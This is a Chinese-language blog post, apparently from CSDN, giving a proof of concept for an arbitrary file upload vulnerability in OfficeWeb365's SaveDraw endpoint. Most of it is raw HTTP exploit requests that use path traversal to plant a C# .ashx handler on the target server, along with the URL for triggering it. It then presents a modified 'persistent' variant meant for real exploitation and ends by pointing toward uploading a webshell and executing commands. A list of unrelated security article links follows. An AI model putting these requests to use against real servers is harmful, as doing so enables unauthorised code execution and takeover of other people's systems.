OfficeWeb365 SaveDraw 任意文件上传漏洞

OfficeWeb365SaveDraw 接口存在文件上传漏洞,允许攻击者上传任意文件并执行恶意代码,从而获取服务器权限。这一漏洞影响版本包括 v8.6.1.0v7.18.23.0

漏洞利用示例

攻击者通过以下 HTTP 请求上传恶意文件:

POST /PW/SaveDraw?path=../../Content/img&idx=10.ashx HTTP/1.1

Host: xx.xx.xx.xx:8088

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

Content-Type: application/x-www-form-urlencoded

data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler

{

public void ProcessRequest(System.Web.HttpContext context)

{

System.Web.HttpResponse response = context.Response;

response.Write(44 * 41);

string filePath = context.Server.MapPath("/") + context.Request.Path;

if (System.IO.File.Exists(filePath))

{

System.IO.File.Delete(filePath);

}

}

public bool IsReusable

{

get { return false; }

}

}///---

成功后,攻击者可通过访问 http://target.com/Content/img/UserDraw/drawPW10.ashx 执行上传的恶意代码。

但是这个代码是一次性的 访问后就会删除 因为网上的POC有System.IO.File.Delete(filePath);

所以再真的利用的poc要用

GET /PW/SaveDraw?path=../../Content/img&idx=bddalnpl.ashx HTTP/1.1

Host: target

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Content-Length: 511

data:image/png;base64,30087ab5b1cd6d7d34d7f22f53819448<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler

{

public void ProcessRequest(System.Web.HttpContext context)

{

System.Web.HttpResponse response = context.Response;

response.Write("Webshell");

string filePath = context.Server.MapPath("/") + context.Request.Path;

if (System.IO.File.Exists(filePath))

{

System.IO.File.Delete(filePath);

}

}

public bool IsReusable

{

get { return false; }

}

}///---

这个POC就长久化了。最后上传成品并执行命令

相关推荐
Deepoch2 小时前
Deepoc 具身模型开发板赋能智能轮椅自主随行与安全控制技术研究
人工智能·科技·安全·开发板·deepoc·智能轮椅
小白电脑技术2 小时前
OpenClaw的API密钥存在电脑里,远程调用安全吗?
安全·电脑·openclaw
KivenMitnick2 小时前
CialloVOL 1.2:便捷好用的轻量化内存取证分析平台
windows·python·安全·网络安全·flask·系统安全·安全威胁分析
他是龙5512 小时前
70:Python安全 & SSTI模板注入 & Jinja2引擎 & 利用绕过 & 工具实战
开发语言·python·安全
wtsolutions2 小时前
JSON-to-Excel 本地化应用发布:安全离线转换,数据零泄露
安全·json·excel
网络安全许木3 小时前
自学渗透测试第27天(基础补漏与工具的快捷键)
网络安全·渗透测试
锐速网络3 小时前
渗透测试中如何验证漏洞真实存在
web安全·网络安全·渗透测试·漏洞复现·sql注入·文件上传漏洞·漏洞验证
Chockmans3 小时前
春秋云境CVE-2018-3191
安全·web安全·系统安全·网络攻击模型·安全威胁分析·春秋云境·cve-2018-3191
云_杰3 小时前
拒绝社死!旁边有人偷瞄?教你给App加上鸿蒙系统级“防窥”黑科技!
安全·harmonyos